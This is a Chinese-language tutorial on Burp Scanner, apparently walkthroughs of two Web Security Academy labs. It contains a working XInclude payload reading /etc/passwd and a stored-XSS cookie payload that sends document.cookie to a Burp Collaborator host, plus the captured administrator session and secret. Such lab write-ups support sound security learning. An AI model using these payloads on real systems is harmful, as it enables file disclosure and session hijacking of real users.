Burp Scanner

除了可用Burp Scanner全站掃描外,也可優化手動測試工作流程,常見的用法有以下2種


掃描特定請求

如果遇到有趣的功能或行為時,可將請求交給 Burp Scanner測試是否有安全問題,舉例如下

瀏覽網站分析請求時,發現/product/stock請求,該請求的參數ProductID看起來很可疑,研判是是易受攻擊的端點

可在proxy/http history下選擇/product/stock,並按右鍵選Do Active Scan

掃描後就會發現有out-of-band resource load(HTTP)問題,這可能引導應用程式檢索任意外部URL的內容並在自己的回應中傳回這些內容,因此可以在請求手動增加XML取得/etc/password

POST /product/stock HTTP/1.1
...omit...

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Lab: Discovering vulnerabilities quickly with targeted scanning


掃描自訂插入點

如果對請求中的參數有興趣,可以指定參數測試是否有安全問題,舉例如下

分析網站後發現請求中wiener字串很可疑,因此選擇該字串並右鍵選scan manual insertion point

GET /my-account?id=wiener HTTP/1.1
Host: 0a24008b03c8fdc781b2129000450061.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <https://0a24008b03c8fdc781b2129000450061.web-security-academy.net/login>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=wiener%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

掃描完後可在dashboard中看報告,會發現Cross-site scripting (stored)安全問題如下

GET /my-account?id=wiener HTTP/1.1
Host: 0a24008b03c8fdc781b2129000450061.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <https://0a24008b03c8fdc781b2129000450061.web-security-academy.net/login>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f7hp0l2dgbf5gi9x5uwe4uu3wxn3gr6fy5mwcj27r%5c.burpcollaborator.net%60%3e%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

到Collaborator取得新的位置g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net 並替換原本請求的位置後重新送出請求

GET /my-account?id=wiener HTTP/1.1
Host: 0acc00ec04dbbaf98304bed20018002e.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net/login>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session='"><svg/onload=fetch(//g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net/${encodeURIComponent(document.cookie)})>:OPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

在Collaborator會接收到以下內容,可以看到session=administrator:3aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm,成功取得最高管理員的session

GET /session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm%3B%20secret%3DLCh8KAlFhQbU6Qf8xqnD2w0KZ7sEZcW6%3B%20session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm HTTP/1.1
Host: g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: [<https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net>](<https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net/>)
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net/>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Lab: Scanning non-standard data structures